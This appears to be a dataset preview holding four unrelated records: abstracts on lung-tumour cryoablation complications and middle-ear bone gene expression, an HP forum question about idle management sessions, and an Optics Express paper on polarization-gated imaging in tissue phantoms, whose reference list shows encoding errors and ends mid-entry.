text
stringlengths
192
1.05M
Percutaneous cryoablation of lung tumors: Feasibility and safety Masanori Inoue, Seishi Nakatsuka, Hideki Yashiro, Nobutake Ito, Yotaro Izumi, Yoshikane Yamauchi, Kohei Hashimoto, Keisuke Asakura, Norimasa Tsukada, Masafumi Kawamura, Hiroaki Nomori, Sachio Kuribayashi 研究成果: Article査読 79 被引用数 (Scopus) 抄録 Purpose: To evaluate the safety and feasibility of cryoablation for lung tumors as well as the incidence of, and risk factors for, complications. Materials and Methods: This study included 193 cryoablation sessions for 396 lung tumors in 117 consecutive patients. Univariate and multivariate analyses were performed to assess risk factors for common complications. Changes in laboratory values were analyzed the day after cryoablation. Results: Pneumothorax, pleural effusion, and hemoptysis occurred after 119 (61.7%), 136 (70.5%), and 71 (36.8%) sessions, respectively. Phrenic nerve palsy, frostbite, and empyema occurred after one session each (0.52%). Proximal tumor implantation was observed in one of 471 punctures (0.20%). Of 119 sessions with pneumothorax, 21 (17.6%) required chest tube insertion and two (1.7%) required pleurodesis. Delayed and recurrent pneumothorax occurred in 15 of 193 sessions each (7.8%). A greater number of cryoprobes was a significant (P =.001) predictor of pneumothorax. Male sex (P =.047) and no history of ipsilateral surgery (P =.012) were predictors for the need for chest tube insertion, and no history of ipsilateral surgery (P =.021) was a predictor for delayed/recurrent pneumothorax. Greater number of cryoprobes (P =.001) and no history of ipsilateral surgery (P =.004) were predictors for pleural effusion. Greater number of cryoprobes (P <.001) and younger age (P =.034) were predictors for hemoptysis. Mean changes in white blood cell count, platelet count, hemoglobin level, and C-reactive protein level were 2,418/μL ± 2,260 (P <.001), -2.0 × 10 4/μL ± 3.2 (P <.001), -0.77 mg/dL ± 0.89 (P <.001), and 3.0 mg/dL ± 2.9 (P <.001), respectively. Conclusions: Percutaneous cryoablation could be performed minimally invasively with acceptable rates of complications. 本文言語English ページ(範囲)295-302 ページ数8 ジャーナルJournal of Vascular and Interventional Radiology 23 3 DOI 出版ステータスPublished - 2012 3月 ASJC Scopus subject areas • 放射線学、核医学およびイメージング • 循環器および心血管医学 フィンガープリント 「Percutaneous cryoablation of lung tumors: Feasibility and safety」の研究トピックを掘り下げます。これらがまとまってユニークなフィンガープリントを構成します。 引用スタイル
Forskning Udskriv Udskriv Switch language Rigshospitalet - en del af Københavns Universitetshospital Udgivet Bone signaling in middle ear development: a genome-wide differential expression analysis Publikation: Bidrag til tidsskriftTidsskriftartikelForskningpeer review DOI 1. The viability of perilabyrinthine osteocytes: a quantitative study using bulk-stained undecalcified human temporal bones Publikation: Bidrag til tidsskriftTidsskriftartikelForskningpeer review 1. Cochlear MRI Signal Change Following Vestibular Schwannoma Resection Depends on Surgical Approach Publikation: Bidrag til tidsskriftTidsskriftartikelForskningpeer review 2. The effect of structured self-assessment in virtual reality simulation training of mastoidectomy Publikation: Bidrag til tidsskriftTidsskriftartikelForskningpeer review 3. Association of SLC26A4 mutations, morphology, and hearing in pendred syndrome and NSEVA Publikation: Bidrag til tidsskriftTidsskriftartikelForskningpeer review Vis graf over relationer Common middle ear diseases may affect bone behavior in the middle ear air cell system. To understand this pathologic pneumatization, the normal development of bone in the middle ear should be investigated. The objective of this study was to analyze gene expression of bone-related signaling factors and gene sets in the developing middle ear. Microarray technology was used to identify bone-related genes and gene sets, which were differentially expressed between the lining tissue of adult (quiescent) bulla and young (resorbing/forming) bulla. Data were analyzed using tools of bioinformatics and expression levels of selected genes were validated using quantitative polymerase chain reaction. The candidate gene products were compared with previously published data on middle ear bone metabolism. No differentially expressed genes were found on the outer surface of bulla. On the inner lining a total of 260 genes were identified of which 22 genes were involved in bone metabolism. Gene set analysis revealed five enriched bone-related gene sets. The identified differentially expressed bone-related mRNAs and gene sets are of potential significance in the normally developing bulla. These factors and gene sets may also play important roles during pathologic pneumatization of the middle ear air cell system in common middle ear diseases. In addition, this study suggests that the control of growth rate and wall thickness from resorptive as well as formative signals all originate from the inner lining cells of the bulla wall. OriginalsprogEngelsk TidsskriftAnatomical record (Hoboken, N.J. : 2007) Vol/bind297 Udgave nummer12 Sider (fra-til)2349-55 Antal sider7 ISSN1932-8486 DOI StatusUdgivet - dec. 2014 ID: 44846022
BladeSystem Virtual Connect cancel Showing results for  Search instead for  Did you mean:  How to kill idle sessions in VC-Management (FW 1.34) Peter Dressel Occasional Advisor How to kill idle sessions in VC-Management (FW 1.34) Hi, Customer aks, why it is not possible to kill idle sessions in VC-Mgmt? Same function is possible in OA! What happens with death idle sessions on VC-Mgmt? Thanks in advance Peter Dressel
OSA's Digital Library Optics Express Optics Express • Editor: Michael Duncan • Vol. 13, Iss. 11 — May. 30, 2005 • pp: 4185–4195 « Show journal navigation Expression of target optical properties in subsurface polarization-gated imaging Ralph Nothdurft and Gang Yao  »View Author Affiliations Optics Express, Vol. 13, Issue 11, pp. 4185-4195 (2005) http://dx.doi.org/10.1364/OPEX.13.004185 View Full Text Article Acrobat PDF (1893 KB) Browse Journals / Lookup Meetings Browse by Journal and Year     Lookup Conference Papers Close Browse Journals / Lookup Meetings Article Tools Share Citations Abstract We examined the expression of target optical properties in subsurface polarization imaging under linearly and circularly polarized illumination. Reflecting, scattering, and absorption targets were imaged in tissue mimic phantoms. The polarization gated images were compared with raw and unpolarized images to determine image enhancement as a function of target depth. The experimental results were also compared with Monte-Carlo simulations to study the model’s applicability. Our results indicated that polarization imaging provided a means to separate different optical targets where they would otherwise appear similar under unpolarized light. © 2005 Optical Society of America 1. Introduction Subsurface polarization imaging is a direct extension of common video-imaging setup by incorporating optical elements to choose illumination polarization states and detect specific polarized backscattering light [1 1. S. G. Demos and R.R. Alfano, “Optical polarization imaging,” Appl. Opt. 36, 150–155 (1997). [CrossRef] [PubMed] ]. So far, most of the relevant studies have focused on using polarization gating to reject surface glare for probing deep tissue [2 2. W. Groner, J. W. Winkelman, A. G. Harris, C. Ince, G. J. Bouma, K. Messmer, and R. G. Nadeau, “Orthogonal polarization spectral imaging: A new method for study of the microcirculation,” Nature Medicine 5, 1209–1213(1999). [CrossRef] [PubMed] 4 4. S. P. Morgan and I.M. Stockford, “Surface-reflection elimination in polarization imaging of superficial tissue,” Opt. Lett. 28, 114–116(2003). [CrossRef] [PubMed] ], or to selectively detect photons from superficial layers [5 5. V. Backman, R. Gurjar, K. Badizadegan, I. Itzkan, P.R. Dasari, L.T. Perelman, and M.S. Feld, “Polarized light scattering spectroscopy for quantitative measurement of epithelial cellular structures in situ,” IEEE J. Quantum Electron 5, 1019–1026(1999) [CrossRef] ]. On the other hand, using polarization responses as contrast mechanisms has not been well studied in the context of imaging. Demos et al. [6 6. S. G. Demos, A.J. Papadopoulos, H. Savage, A.S. Heerdt, S. Schantz, and P.R. Alfano, “Polarization filter for biomedical tissue optical imaging,” Photochemistry & Photobiology 66, 821–5(1997). [CrossRef] ] reported that bulk cancerous tissues had higher depolarization ratio than normal tissues. Jacques et al. [7 7. S. L. Jacques, J. R. Roman, and K. Lee, “Imaging superficial tissues with polarized light,” Lasers in Surg. & Med. 26, 119–129(2000). [CrossRef] , 8 8. S. L. Jacques, J. C. Ramella-Roman, and K. Lee, “Imaging skin pathology with polarized light,” J. Biomed. Opt. 7, 329–340(2002). [CrossRef] [PubMed] ] further demonstrated that polarization–sensitive detection could indeed discriminate different skin pathological features. However the detailed mechanisms behind these phenomena are not quite clear in inhomogeneous samples. In addition, linearly polarized light is usually used because they’re easy to calibrate and handle, while there were studies indicating circularly polarized light propagated differently inside scattering media [9 9. V. Sankaran, M.J. Everett, D.J. Maitland, and J.T. Walsh, “Comparison of polarized-light propagation in biological tissue and phantoms,” Opt. Lett. 24, 1044–1046(1999). [CrossRef] 12 12. X. Ni and R. R. Alfano, “Time-resolved backscattering of circularly and linearly polarized light in a turbid medium,” Opt. Express 29, 2773–2775 (2004). ]. Therefore, different polarized light could be utilized to fully reveal the optical properties difference. 2. Materials and methods The tissue mimic phantom consisted of Intralipid (Intralipid 20%, Kabi Pharmacia, Clayton, NC) and Indian ink diluted in distilled water. Intralipid solution has been widely used to make tissue mimic phantom. Various Intralipid and ink concentrations were used to make samples with scattering coefficients µs=15-60cm-1, anisotropy g=0.83, and absorption coefficient µa=0.05-0.2 cm-1. Three types of 3×3mm2 targets were embedded in the scattering phantom. They represented three distinct contrast mechanisms: reflecting, scattering, and absorption. The reflecting target was a microscope cover slip sputter-coated with a 120nm layer of platinum. The other targets were plastic backing coated with a thick layer of model paint. Black paint and white paint served as our highly absorbing and highly scattering targets respectively. Glossy and flat versions of both colors were tested to examine the impact of fine surface features. Targets were mounted on a wire arm attached to a vertical stage. The wire arm was designed so that only a very small area directly beneath the target was obstructed. The vertical stage allowed continuous height adjustments with 0.01mm resolution. The depth of material below the target was significantly greater than the target depths examined so that the phantoms can be treated as semi-infinite media. A Monte-Carlo simulation program [13 13. G. Yao, “Differential optical polarization imaging in turbid media with different embedded objects,” Opt. Comm. 241, 255–261 (2004). [CrossRef] ] was also used to examine the impact of target properties. Simulation parameters were set to those used in the experiments. 2.1 Image acquisition Figure 1 shows a diagram of the experimental setup. A He-Ne laser provided 10mW of polarized light at 633nm wavelength. The laser beam size was expanded to illuminate a 20mm sample area at 45° incidence. A variable waveplate (VW) selected either linearly or circularly polarized light, and allowed fine-tuning of circular polarized light to compensate for other components in the system. Light returning from the phantom was captured at normal incidence after passing through a quarter waveplate (QW) and a linear polarizer (P). A CCD camera (Pulnix TM-7AS) captured 640×480 8bit gray scale images. The camera aperture accepted photons within 1.7° over a 16mm by 12mm imaging area. The focal depth was sufficient to cover the full range of heights measured. The polarization precision was carefully calibrated. When the polarizers were finely adjusted with a power meter in place of the camera and a mirror in place of the phantom, polarization extinction ratios of 0.11‰ and 0.14‰ were achieved for linearly and circularly polarized light, respectively. Fig. 1. Schematic diagram of experimental setup. The resulting images were acquired into a computer for recording. Multiple averaging was performed at the time of capture to reduce speckle noise. In order to compensate for the inhomogeneity in the incident light, an image was taken for each set with no target present. This base image was smoothed with a Gaussian kernel and used to normalize the other images in the set. The normalization was applied to the raw images prior to analysis. 2.2 Image processing and contrast The four raw component images consisted of the linearly and circularly co-polarized (CO) and cross-polarized (CR) images post-normalization. The pixel values for the components were straightforward representation of illumination ranging from 0 to 255. When CO and CR components are combined we get the equivalent of an unpolarized image, and here too the values represent illumination. Two different processing methods were evaluated in the experiments: differential polarization (DIFF) image, and degree of polarization (POL) image. The DIFF image was calculated as: DIFF=COCR (1) The corresponding pixel values were from -255 to 255. The POL image was calculated as: POL=DIFF(CO+CR) (2) The corresponding pixel values were from -1 to 1. To make full use of the range of data available we did not take the absolute value of these two combinations. The DIFF image represented the extent to which CO is greater than CR, while the POL represented the degree of co-polarization, both of which can be negative. For image display, the local palette of each image was rescaled to the full 8-bit range available without further processing. All images shown corresponded to areas of 12×12mm2. When interpreting the images, it is important to keep in mind that image appearance depends on the relative pixel values between target and background. For example, a dark target in a POL image means that the amount of light had a lower co-polarization than the background. For a quantitative comparison, we calculated the visibility of the target against the background with: contrast=IobjIbgIobj+Ibg (3) where Iobj was calculated by averaging the middle quarter of the object, and Ibg was calculated by averaging pixels far away from the object. Contrast was capped at 1 if target and background values were of different signs with the justification that the difference in sign made the target trivial to detect. A mismatch of sign only occurred for DIFF and POL images when the target CR was higher than CO. For example, this occurred when circular polarization undergoes reversed helicity because of reflection. The depths of the objects were calculated in mean-free-path (mfp) units, which were defined as the inverse of the summation of the absorption coefficient µa and the scattering coefficient µs. Each measurement was performed three times and the calculated contrast values were averaged. The contrast faithfully represented the target visibility with one caveat: because of the subtraction involved in their calculation, the DIFF and POL images had a lower signal to noise ratio. This can cause an apparent mismatch between the contrast value and the image. We evaluated the noise level at the target location by computing the relative pixel standard deviation (standard deviation/average pixel value). In the component and unpolarized image the noise level was roughly 1%, while in the DIFF and POL it was~7.5%. This level did not necessarily indicate a visible limit, but beyond this point the image quality dropped off dramatically. 3. Results 3.1 Reflecting target Reflection as a contrast mechanism can originate from the layer boundaries of a multilayer tissue structure. A reflecting target has also been used previously as a model to study the penetration depth of coherent imaging system [14 14. Y. Pan, R. Birngruber, and R. Engelhardt, “Contrast limits of coherence-gated imaging in scattering media,” Appl. Opt. 36, 2979–2983 (1997). [CrossRef] [PubMed] ]. For a subsurface imaging system, a reflecting target essentially folds the light space. For circular polarization the result is reversed helicity. Figure 2 shows a set of images of an embedded high reflective object. The background medium had a scattering coefficient of 30cm-1, and absorption coefficient of 0.1cm-1. Fig. 2. Image results of a reflecting target acquired with (a) linearly and (b) circularly polarized light. CO, CR, Unpolarized, DIFF, and POL images are listed from left column to right column. Rows correspond to target depth at 1.5, 4.5, 7.5, and 10.5mfp. The target region in the raw images was composed primarily from photons from the target. For shallow depths the result was a very bright target in linear CO and a dark target for linear CR. The reversed helicity resulted in a dark CO and bright CR targets under circular polarization. For highly scattering phantoms, those dark targets went through a crossover point where both the CO and CR images had targets brighter than the background because of the increased multiple scattering. The bright target in the linear POL indicated higher co-polarization than the background, while the dark target in circular POL indicated higher cross-polarization caused by reflection. Figure 3 shows the detailed contrast behavior at different object depths. For linearly polarized light, CO images had better contrast than CR images. Linear DIFF and POL offered significant contrast improvement with DIFF being just slightly better. For circularly polarized light, the CR component gave better contrast than CO. The circular DIFF and POL contrast were identical and offer significantly improved contrast. Circular polarization led to a much higher contrast in the DIFF/POL images with a small increase in maximum visible depth. Both linear and circular raw images (CO and CR) had similar imaging depths as their gated combinations. Although DIFF and POL contrast have different physical interpretations, they overlapped completely under circularly polarized illumination and closely matched with linearly polarized light. Fig. 3. Contrast plots for a reflecting target under (a) linearly and (b) circularly polarized illumination. 3.2 Scattering target Figure 4 shows a set of images of an embedded high scattering object (white paint). The phantom had a scattering coefficient of 30cm-1, and absorption coefficient of 0.1cm-1. Despite a higher total illumination, the difference between the CO and CR components was smaller than that of the background for both linear and circular. The result was a dark target in the DIFF image. This smaller difference in a region with greater total illumination led to a dark target with higher contrast in the POL images. The scattering target was consistently brighter than the background because more light was reflected back from the target than from the background. Both linearly and circularly polarized light were highly scattered from the target so that at 1.5mfp the light from target was 52% co-polarized compared to 54% from the background. Because the scattering target and media showed little preference for helicity, the circular and linear images were visually similar. Fig. 4. Image results of a scattering target acquired with (a) linearly and (b) circularly polarized light. CO, CR, Unpolarized, DIFF, and POL images are listed from left column to right column. Rows correspond to target depth at 1.5, 4.5, 7.5, and 10.5mfp. Figure 5 shows the calculated image contrast values at different object depths. Linear POL was the best of the linear methods until 6mfp where unpolarized light offered equivalent contrast. Among the four components, linear and circular CRs were slightly better than unpolarized light. The circular DIFF image had better contrast than unpolarized light up to 4.5mfp. Overall, circular POL offered the best contrast improvement for the scattering target up to 7.5mfp depth. The CO and CR components had imaging depths nearly equivalent to the unpolarized light. By contrast the POL and DIFF images were only useful for shallower depths with DIFF being the shallowest. The improved contrast under circular polarization is likely due to the single backscattering or small reflection from the target surface. Reversed helicity from backscattering competed with multiply scattered light from the target and the background, which kept the circular polarization closer to 50% and made the circular POL a better choice. Fig. 5. Image contrast for a scattering target under (a) linearly and (b) circularly polarized illumination. 3.3 Absorbing target With absorption we effectively measured the lack of information from the target. The high absorptive target attenuated nearly all of the light that reached it without regard to helicity or orientation so that the target appeared dark in all four components. At 1.5 mfp the total amount of light returned from the absorbing target was 18% of that returned from the background, and only 11% of that returned from a scattering target at the same depth. Fig. 6. Image results of an absorption target acquired with (a) linearly and (b) circularly polarized light. CO, CR, Unpolarized, DIFF, and POL images are listed from left column to right column. Rows correspond to target depth at 1.5, 4.5, 7.5, and 10.5mfp. Figure 6 shows a set of images of an embedded high absorption object (flat black paint). The background medium had a scattering coefficient of 30 cm-1, and absorption coefficient of 0.1cm-1. Figure 7 shows the calculated image contrast values at different object depths. Unlike the reflecting target, the DIFF and POL did not match. Unlike the scattering target, the linear and circular polarization images were different. Fig. 7. Image contrast for an absorption target under (a) linearly and (b) circularly polarized illumination. The DIFF image presented a dark target because the difference between the linear CO and CR of the target was less than that of the background. The linear POL however presented a bright target, so while there was little light returning from the target region, what light there was maintained the incident polarization. At shallow depths the absorbing target POL gave low value over low value (Eq. (2)) which made it sensitive to relatively small changes in the returning light. Only the circular DIFF offered slight contrast improvement up to 4mfp. This improvement was probably due to residual reflection at the target surface. We can tell this light was reflected off the surface because the circular POL image was the reverse of its linear counterpart at shallow depths. If light were scattered from the absorbing target then it should have lost polarization and appeared identical in linear and circular. Highly scattered background photons competed with the reversed helicity off the surface in circular. The reversed helicity caused the numerator in POL to be smaller, and this offset the larger denominator in the background areas. A crossover point at 4.5mfp in the circular POL contrast was indicative of the two competing sources. At greater depths, light from the surface reflection was quickly washed out by light from the background. 4. Discussion 4.1 Different target behavior in polarization images For unpolarized light, different targets may appear similarly. For example, both scattering objects and reflecting objects appeared as bright targets. For a highly scattering phantom (µs=60cm-1, µa=0.1cm-1), the total illumination from the reflecting target was actually less than the background at small depths because of the oblique incidence. Therefore the reflecting object appeared similar to a slightly absorbing target in unpolarized images. On the other hand, in polarization-gated images, the reflecting, scattering and absorbing targets behaved very differently. At shallow depths, the linearly polarized components easily separated the scattering and reflecting targets since the scattering target appeared bright in both CO and CR images, while the reflecting object had different appearance. At deeper depths, the linear POL still revealed a dark scattering target but a bright reflecting target. Similarly, the absorption object and the reflecting object had distinct appearance in polarized images, and the increased POL contrast was an indication of the reflecting target at greater depths. In our µs=30cm-1, µa=0.1cm-1 phantom, the total light (denominator in the POL calculation) from the reflecting target was very close to that from the background. Thus, the resulting POL image had similar contrast as DIFF image. In the phantoms with different µs and µa, the DIFF and POL contrast were not identical, but still quite close. By comparison, the absorbing and scattering targets displayed markedly different behavior in the DIFF and POL images. For example, POL contrast was higher for the scattering target, while the absorbing target showed a higher contrast in circular DIFF and a lower contrast in linear POL. This suggested that comparing the DIFF and POL values can differentiate the reflecting contrast mechanism from other optical properties. The scattering and absorbing targets had poorer contrast in the DIFF image than in the components, while the reflecting target was significantly improved. The POL processing improved the image contrast for the predominantly scattering target because highly depolarized light in an area of high illumination gives a small numerator over a large denominator. This situation should be sensitive to the amount of target absorption. As target µa increases, the influx of light from the background should make up a larger portion of total light from the target. When the target was predominantly absorptive, the POL contrast was very poor beyond shallow depths. However at these depths, the low denominator in the POL calculation made the contrast very sensitive to small changes in the polarization state of light from the target. The glossy and flat versions of the scattering and absorbing targets resulted in identical contrast curves although they had distinctly different surface conditions. This observation indicated the surface conditions played insignificant roles comparing to their bulk optical properties. In other words, these differences may have been too insignificant to impact the results in turbid media. 4.2 Effects of background optical properties Fig. 8. Contrast of a reflecting target in (a) POL and (b) unpolarized images from phantoms with different scattering and absorption coefficients Our results indicated that mean-free-path was a good unit for gauging the imaging depth as well as the target size. The POL image indicated the degree of light co-polarization in the target area. As µs decreased, the affective area of the target (if represented in mfp) also decreased. As such, this “apparent” smaller target blocked less light from the background. Because the background light tended to be unpolarized, the POL contrast became slightly worse. Our experimental results confirmed this behavior; the higher µs resulted in better contrast while the lower µs led to reduced contrast. As the ratio of µs to µa decreased, a greater percentage of light was absorbed per mfp, which was mainly determined by µs. The total illumination from both the background and target area decreased as a result. The impact of this was greater on the target area, as the lower µs to µa ratio resulted in lower contrast, while the higher µs to µa ratios resulted in higher contrast. The contrast curves for the unpolarized light showed a very different response depending on the optical properties of the media (Fig 8b) as did the individual components. The DIFF and POL curves were relatively stable by comparison. The same behavior is seen with circular polarization, albeit with reversed helicity. This suggests that the DIFF and POL contrast measurement might provide a reliable mechanism to detect the same target despite variations in background optical properties. 4.3 Effects of circularly polarized light Two aspects of circular polarization make it of particular interest. First, under reflection or large angle backscattering, the polarization helicity is reversed. Such change in handedness can differentiate highly reflected and diffused photons and might be useful to improving contrast at tissue boundaries. The second is polarization memory, a tendency for circularly polarized light to maintain its polarization as compared to linearly polarized light. Polarization memory is a function of wavelength and relative size of the scatterers. Small scatterers lead to Rayleigh scattering favoring linearly polarized light, while larger scatterers experience Mie scattering and favor circularly polarized light [12 12. X. Ni and R. R. Alfano, “Time-resolved backscattering of circularly and linearly polarized light in a turbid medium,” Opt. Express 29, 2773–2775 (2004). , 15 15. A. D. Kim and M. Moscoso, “Backscattering of circularly polarized pulses,” Opt. Lett. 27, 1589–1591 (2002). [CrossRef] ]. It has been demonstrated [12 12. X. Ni and R. R. Alfano, “Time-resolved backscattering of circularly and linearly polarized light in a turbid medium,” Opt. Express 29, 2773–2775 (2004). ] that polarization memory might be used to extend the probing depths in polarization imaging. Despite a lack of polarization memory in the experiments, the reversed helicity from surface reflection provided significant contrast improvement for the reflective target. Our experimental results indicated that circular POL images also gave the best contrast for scattering targets. However, for the absorbing target, circularly polarized light produced images with contrast less than that from linearly polarized light or unpolarized light except for shallow depths, where reversed helicity from small surface reflection improved the circular DIFF contrast. 4.4 Monte-Carlo simulation Monte-Carlo simulation [13 13. G. Yao, “Differential optical polarization imaging in turbid media with different embedded objects,” Opt. Comm. 241, 255–261 (2004). [CrossRef] ] has been used to examine the impact of target properties. To quantitatively test its numerical accuracy, we compared the behavior for the reflecting target because it has well defined behavior. Figure 9 compares the experimental and simulated POL contrast for linear and circular polarization using µs=30cm-1, µa=0.1cm-1 and g=0.83. Fig. 9. Monte Carlo simulation of (a) linear and (b) circular POL contrast compared with experimental results. Under linear polarization, the Monte Carlo results matched very well with the experimental results. For circular polarization the contrast profiles were nearly identical, but simulation results were offset roughly 2.0mfp shallower than the experimental results. The Monte Carlo simulation was explicitly coded to simulate Mie scattering. In a departure from the Intralipid phantom, the simulations displayed polarization memory resulting in 53.05% linear and 62.12% circular background co-polarization. There are other possibilities that might have caused this discrepancy. The simulated method of detection may not accurately reproduce the experiments. For example, Intralipid has a broad particle size distribution, while single size particle was assumed in Monte Carlo simulation. More experiments using ideal Mie particles (polystyrene spheres) can further clarify these issues. Nevertheless, our results indicated the Monte Carlo simulation can be useful for studying subsurface polarization imaging. 5. Conclusions Polarization images provided a means to separate the predominantly reflecting, scattering, and absorbing targets where they would otherwise appear similar under unpolarized light. Additionally, no single polarization component or their combinations resulted in significantly improved contrast for all of the targets. For the reflecting target the gated polarization images (i.e., the POL and DIFF images) offered imaging depth slightly better than the best raw component image. For scattering target, the components images had slightly larger imaging depth. For absorbing target, the gated polarization images were significantly worse than the raw component images. Results from the reflective target showed the POL and DIFF contrast are relatively stable with respect to the optical properties of the background media. The Monte-Carlo simulation proved useful in exploring target and media combinations prior to complicated laboratory arrangements. Experimental results confirmed the simulation predictions for the contrast improvement from the three predominant targets. For linear polarization the simulation results were a strong numerical match for the experimental results from the reflecting target. The circular behavior showed small discrepancies between simulation and experimental results and need further studies. In this examination off-normal incidence with normal detection was used to avoid specular reflection from the phantom surface. However, our results on different targets’ behavior in scattering media should be applicable to coaxial measurement configuration. While targets with pure optical properties were used in this study, many different properties may appear in a single target in practice. The final contrast would be a weighted summation of these different contributions and our results may help to identify the dominant contrast mechanisms. Although Intralipid phantoms have been widely used, many biological tissues may display additional polarization properties [9 9. V. Sankaran, M.J. Everett, D.J. Maitland, and J.T. Walsh, “Comparison of polarized-light propagation in biological tissue and phantoms,” Opt. Lett. 24, 1044–1046(1999). [CrossRef] ], especially when there are strongly organized structures [7 7. S. L. Jacques, J. R. Roman, and K. Lee, “Imaging superficial tissues with polarized light,” Lasers in Surg. & Med. 26, 119–129(2000). [CrossRef] , 8 8. S. L. Jacques, J. C. Ramella-Roman, and K. Lee, “Imaging skin pathology with polarized light,” J. Biomed. Opt. 7, 329–340(2002). [CrossRef] [PubMed] ]. More studies are necessary to clarify these issues. Acknowledgments This research was made possible by a research board grant from the University of Missouri. We would like to thank Mr. Jinjun Xia for measuring sample optical properties. References and links 1. S. G. Demos and R.R. Alfano, “Optical polarization imaging,” Appl. Opt. 36, 150–155 (1997). [CrossRef] [PubMed] 2. W. Groner, J. W. Winkelman, A. G. Harris, C. Ince, G. J. Bouma, K. Messmer, and R. G. Nadeau, “Orthogonal polarization spectral imaging: A new method for study of the microcirculation,” Nature Medicine 5, 1209–1213(1999). [CrossRef] [PubMed] 3. S. G. Demos, H. B. Radousky, and R. R. Alfano, “Deep subsurface imaging in tissues using spectral and polarization filtering,” Opt. Express 7, 23–28(2000). [CrossRef] [PubMed] 4. S. P. Morgan and I.M. Stockford, “Surface-reflection elimination in polarization imaging of superficial tissue,” Opt. Lett. 28, 114–116(2003). [CrossRef] [PubMed] 5. V. Backman, R. Gurjar, K. Badizadegan, I. Itzkan, P.R. Dasari, L.T. Perelman, and M.S. Feld, “Polarized light scattering spectroscopy for quantitative measurement of epithelial cellular structures in situ,” IEEE J. Quantum Electron 5, 1019–1026(1999) [CrossRef] 6. S. G. Demos, A.J. Papadopoulos, H. Savage, A.S. Heerdt, S. Schantz, and P.R. Alfano, “Polarization filter for biomedical tissue optical imaging,” Photochemistry & Photobiology 66, 821–5(1997). [CrossRef] 7. S. L. Jacques, J. R. Roman, and K. Lee, “Imaging superficial tissues with polarized light,” Lasers in Surg. & Med. 26, 119–129(2000). [CrossRef] 8. S. L. Jacques, J. C. Ramella-Roman, and K. Lee, “Imaging skin pathology with polarized light,” J. Biomed. Opt. 7, 329–340(2002). [CrossRef] [PubMed] 9. V. Sankaran, M.J. Everett, D.J. Maitland, and J.T. Walsh, “Comparison of polarized-light propagation in biological tissue and phantoms,” Opt. Lett. 24, 1044–1046(1999). [CrossRef] 10. V. Sankaran, J. T. Walsh, and D. J. Maitland, “Polarized light propagation through tissue phantoms containing densely packed scatterers,” Opt. Lett. 25, 239–241(2000). [CrossRef] 11. V. Sankaran, J. T. Walsh, and D. J. Maitland, “Comparative study of polarized light propagation in biologic tissues,” J. Biomed. Opt. 7, 300–306(2002). [CrossRef] [PubMed] 12. X. Ni and R. R. Alfano, “Time-resolved backscattering of circularly and linearly polarized light in a turbid medium,” Opt. Express 29, 2773–2775 (2004). 13. G. Yao, “Differential optical polarization imaging in turbid media with different embedded objects,” Opt. Comm. 241, 255–261 (2004). [CrossRef] 14. Y. Pan, R. Birngruber, and R. Engelhardt, “Contrast limits of coherence-gated imaging in scattering media,” Appl. Opt. 36, 2979–2983 (1997). [CrossRef] [PubMed] 15. A. D. Kim and M. Moscoso, “Backscattering of circularly polarized pulses,” Opt. Lett. 27, 1589–1591 (2002). [CrossRef] 16. I. M. Stockford, S. P. Morgan, P. C. Y. Chang, and J. G. Walker, “Analysis of the spatial distribution of polarized light backscattered from layered scattering media,” J. Biomed. Opt. 7, 313–320(2002) [CrossRef] [PubMed] 17. H. J. van Staveren, C. J. M. Moes, J. van Marle, S. A. Prahl, and M. J. C. van Gemert, “Light scattering in Intralipid-10% in the wavelength range of 400–1100nm,” Appl. Opt. 30, 4507–4514(1991). [CrossRef] [PubMed] 18. N. Ghosh, H. S. Patel, and P. K. Gupta, “Depolarization of light in tissue phantoms-effect of a distribution in the size of scatterers,” Opt. Express 11, 2198–2205(2003). [CrossRef] [PubMed] OCIS Codes (110.7050) Imaging systems : Turbid media (170.3880) Medical optics and biotechnology : Medical and biological imaging (260.5430) Physical optics : Polarization (290.4020) Scattering : Mie theory (290.4210) Scattering : Multiple scattering (290.7050) Scattering : Turbid media ToC Category: Research Papers History Original Manuscript: February 28, 2005 Revised Manuscript: May 19, 2005 Published: May 30, 2005 Citation Ralph Nothdurft and Gang Yao, "Expression of target optical properties in subsurface polarization-gated imaging," Opt. Express 13, 4185-4195 (2005) http://www.opticsinfobase.org/oe/abstract.cfm?URI=oe-13-11-4185 Sort:  Journal  |  Reset   References 1. S. G. Demos and R.R. Alfano, �??Optical polarization imaging,�?? Appl. Opt. 36, 150-155 (1997). [CrossRef] [PubMed] 2. W. Groner, J. W. Winkelman, A. G. Harris, C. Ince, G. J. Bouma, K. Messmer, and R. G. Nadeau, �??Orthogonal polarization spectral imaging: A new method for study of the microcirculation,�?? Nature Medicine 5, 1209-1213(1999). [CrossRef] [PubMed] 3. S. G. Demos, H. B. Radousky, and R. R. Alfano, �??Deep subsurface imaging in tissues using spectral and polarization filtering,�?? Opt. Express 7, 23-28(2000). [CrossRef] [PubMed] 4. S. P. Morgan and I.M. Stockford, "Surface-reflection elimination in polarization imaging of superficial tissue," Opt. Lett. 28, 114-116(2003). [CrossRef] [PubMed] 5. V. Backman, R. Gurjar, K. Badizadegan, I. Itzkan, P.R. Dasari, L.T. Perelman, and M.S. Feld, �??Polarized light scattering spectroscopy for quantitative measurement of epithelial cellular structures in situ,�?? IEEE J. Quantum Electron 5, 1019-1026(1999) [CrossRef] 6. S. G. Demos, A.J. Papadopoulos, H. Savage, A.S. Heerdt, S. Schantz, and P.R. Alfano, �??Polarization filter for biomedical tissue optical imaging,�?? Photochemistry & Photobiology 66, 821-5(1997). [CrossRef] 7. S. L. Jacques, J. R. Roman, and K. Lee, "Imaging superficial tissues with polarized light," Lasers in Surg. & Med. 26, 119�??129(2000). [CrossRef] 8. S. L. Jacques, J. C. Ramella-Roman, and K. Lee, "Imaging skin pathology with polarized light," J. Biomed. Opt. 7, 329-340(2002). [CrossRef] [PubMed] 9. V. Sankaran, M.J. Everett, D.J. Maitland, and J.T.Walsh, "Comparison of polarized-light propagation in biological tissue and phantoms," Opt. Lett. 24, 1044-1046(1999). [CrossRef] 10. V. Sankaran, J. T. Walsh, and D. J. Maitland, "Polarized light propagation through tissue phantoms containing densely packed scatterers," Opt. Lett. 25, 239-241(2000). [CrossRef] 11. V. Sankaran, J. T. Walsh, and D. J. Maitland, "Comparative study of polarized light propagation in biologic tissues," J. Biomed. Opt. 7, 300-306(2002). [CrossRef] [PubMed] 12. X. Ni and R. R. Alfano, �??Time-resolved backscattering of circularly and linearly polarized light in a turbid medium,�?? Opt. Express 29, 2773-2775(2004). 13. G. Yao, �??Differential optical polarization imaging in turbid media with different embedded objects,�?? Opt. Comm. 241, 255-261(2004). [CrossRef] 14. Y. Pan, R. Birngruber, R. Engelhardt, �??Contrast 